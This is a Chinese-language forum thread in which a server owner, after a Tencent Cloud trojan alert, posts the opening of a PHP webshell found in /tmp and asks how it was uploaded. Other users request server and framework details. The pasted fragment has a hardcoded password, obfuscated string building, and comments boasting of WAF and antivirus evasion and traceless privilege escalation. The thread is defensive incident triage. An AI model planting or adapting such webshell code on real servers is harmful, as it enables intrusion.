腾讯云提醒：检测到存在木马文件

moe

3年前

时间：2022-03-07 19:06:20，检测到存在未处理的木马文件：/tmp/phpN*****，您的服务器疑似被黑客入侵，可能造成严重损失，请即刻前往主机安全控制台（https://console.cloud.tencent.com/cwp ）查看详细信息。

<?php
$password=’admin’;//登录密码
//本次更新：体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色：PHP高版本低版本都能执行，文件短小精悍，方便上传，功能强大，提权无痕迹，无视waf，过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。
$html=’$password’.’=’."’".$password."’;".’@e#html’.”.’v’."".”.”."".”.”.”

复制代码

这是什么情况，请教mjj这是从哪能上传到/tmp文件夹下的。

木马已经清理了，但是不知道从哪传的。

文件发出来帮你看看

葬爱家族发表于 2022-3-7 23:37
文件发出来帮你看看

https://netcut.cn/1ftiglrfu

你得说明你服务器什么系统安装了什么软件
用的什么php程序
开了什么端口
你这样问谁能猜明白

就是一个很普通的大马网站发出来看看

看来还是坐鸡干净利落，没什么码子

同意楼上，建议把网站发出来

小号专用马甲发表于 2022-3-7 23:44
你得说明你服务器什么系统安装了什么软件
用的什么php程序
开了什么端口

上的腾讯轻量的宝塔CentOS 7.9.2009(Py3.7.9)

那都通发表于 2022-3-7 23:45
就是一个很普通的大马网站发出来看看

放了好几个站在上面

用了什么程序吗，TP 或者 laravel框架？